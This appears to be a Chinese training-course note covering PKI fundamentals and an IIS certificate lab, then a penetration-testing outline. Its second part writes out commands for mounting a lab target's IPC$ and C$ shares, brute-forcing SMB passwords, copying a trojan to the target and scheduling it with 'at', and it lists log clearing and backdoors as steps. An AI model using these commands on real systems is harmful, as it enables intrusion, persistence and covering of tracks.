PKI-渗透测试
PKI
- PKI概述 - 名称:PKI(Public Key Infrustructure)公钥基础设施 - 作用:通过加密技术和数字签名保证信息安全。 - 组成:公钥加密技术,数字证书,CA,RA。 
- 信息安全三要素 - 机密性,完整性,身份验证/操作的不可否认性 
- 哪些IT领域用到PKI - SSL/HTTPS
- IPsecVPN
- 部分远程访问VPN
 
- 公钥加密技术 - 作用:实现对信息加密,数字签名等安全保障。 - 加密算法: - 对称加密算法 - 加解密的密钥一致 - DES 3DES AES - x+5=y(对称加密算法) - x是原数据/原文 - y是密文 - 5是key/密钥 
- 非对称密钥 - 通信双方各自产生一对公私钥 - 双方各自交换公钥 - 公钥和私钥为互相加解密关系 - 公私钥不可相互逆推 - RSA DH 
- HASH算法:MD5,SHA(验证完整性) - HASH值可逆吗?不可逆。 - HASH值=摘要 
- 数字签名 - 用自己的私钥对摘要进行加密得出的密文就是数字签名 
- 证书 - 证书用于保证密钥的合法性 - 证书格式遵循x.509标准 - 数字证书包含信息: - 使用者的公钥值 - 使用者标识信息(如名称和电子邮件地址) - 有效期(证书的有效时间) - 颁发者标识信息 - 颁发者的数字签名 
 - 数字证书由权威公正的第三方机构即CA签发 - CA是权威证书颁发机构,为了公正”公钥”的合法性 - 机密性:使用对方的公钥加密 - 身份验证/数字签名:使用自己的私钥 - PKI实验: - win2008作为https服务器:10.1.1.2/24
- xp作为客户机:10.1.1.1/24
- 桥接到虚拟机网络vmenet1
 - 实验步骤: - 配置服务器ip地址10.1.1.2/24
- 安装IIS服务,并建立一个站点。(必须使用域名),在客户机上设置hosts,并初步验证访问。
- 安装CA组件
- 打开IIS,先生成证书申请文件
- 向CA申请证书,打开网页http:10.1.1.2/certsrv并向CA发送web服务器申请文件
- CA颁发证书
- 在web服务器上下载并安装
- 在web服务器上启用SSL443
- 在客户端上修改hosts文件,并验证
- 要求用户必须使用443访问,不能使用80访问
 
渗透测试流程
- 授权 
- 信息收集 - nslookup,whois 
- 扫描漏洞 - namp=ip范围 端口 80(IIS,apache,什么网站)scanpot软件 - 高级扫描:ruIIS漏洞2003-IIS6.0 2008IIS7.0,扫描网站漏洞 
- 漏洞利用 
- 提权(shell环境,桌面环境,最高权限) 
- 清除日志 
- 留后门 
- 渗透测试报告 
测试端口号开放
- (手动)telnet 目标ip 目标端口号
- 使用scanpot软件工具进行端口扫描(推荐Nmap)
利用漏洞进行破解
445漏洞利用之IPC$:
使用命令:net use f: \10.1.1.2\ipc$ 密码 /user:用户
相关命令:
net use f: /del
net use * /del
net use f: \10.1.1.2\c$ 密码 /user:用户
net use f: \10.1.1.2\share 密码 /user:用户
暴力破解系统密码之445
NTscan+密码字典生成工具
留后门
大鲨鱼,冰河,灰鸽子软件编写木马
制作木马
- copy植入木马 - copy d:\heihei.exe \\10.1.1.2\c$ 
- 获取目标时间 - net time \\10.1.1.2 - net time \\ 目标IP地址(两个\后紧跟地址) 
- 设置计划任务自动执行 - at \\10.1.1.2 11:11 “c:\heihei.exe” - at \\10.1.1.2 11:11 “木马程序位置” 
- 查看程序是否存在 - at \\目标ip 
